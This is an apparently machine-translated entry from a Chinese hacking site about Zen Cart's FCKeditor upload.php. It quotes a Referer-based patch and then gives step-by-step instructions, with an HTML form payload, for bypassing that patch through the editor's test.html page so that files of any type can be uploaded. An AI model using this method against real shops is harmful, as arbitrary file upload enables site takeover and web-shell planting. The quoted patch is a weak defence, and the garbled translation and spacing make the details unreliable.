zencart editors/fckeditor bug fixes after the secondary use-vulnerability warning-the black bar safety net

ID MYHACK58:62201336643
Type myhack58
Reporter 佚名
Modified 2013-01-09T00:00:00


Vulnerability file: editors/fckeditor/editor/filemanager/upload/php/upload.php Online given fix solution is to Repair method, remove the FCK editor with other editors Or find editors/fckeditor/editor/filemanager/upload/php/upload.php file In require(‘config.php’); require(‘util.php’); Below add the following code---------- //Prevent outside submission function outsidepost() { $servername=$_SERVER['SERVER_NAME']; $sub_from=@$_SERVER['HTTP_REFERER']; $sub_len=strlen($servername); $checkfrom=substr($sub_from,7,$sub_len); if($checkfrom!=$ servername){ echo(“you don't outsidepost!”); exit; } } outsidepost(); Prevent outside submission, but did not prevent the internal submission, Use method: 1,Open editors/fckeditor/editor/filemanager/browser/default/connectors/test.html 2,in the Current Folder box, enter the <form id=frmUpload enctype=multipart/form-data action=http://www. url. com/editors/fckeditor/editor/filemanager/upload/php/upload. php? Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=5 0><br><input id=btnUpload type=submit value=Upload></form> Then Get the Folders and Files will appear in an upload form, you can upload any file type. PS: if editors and upload folder settings 4 0 3 5 0 0 4 0 4 privilege use is invalid.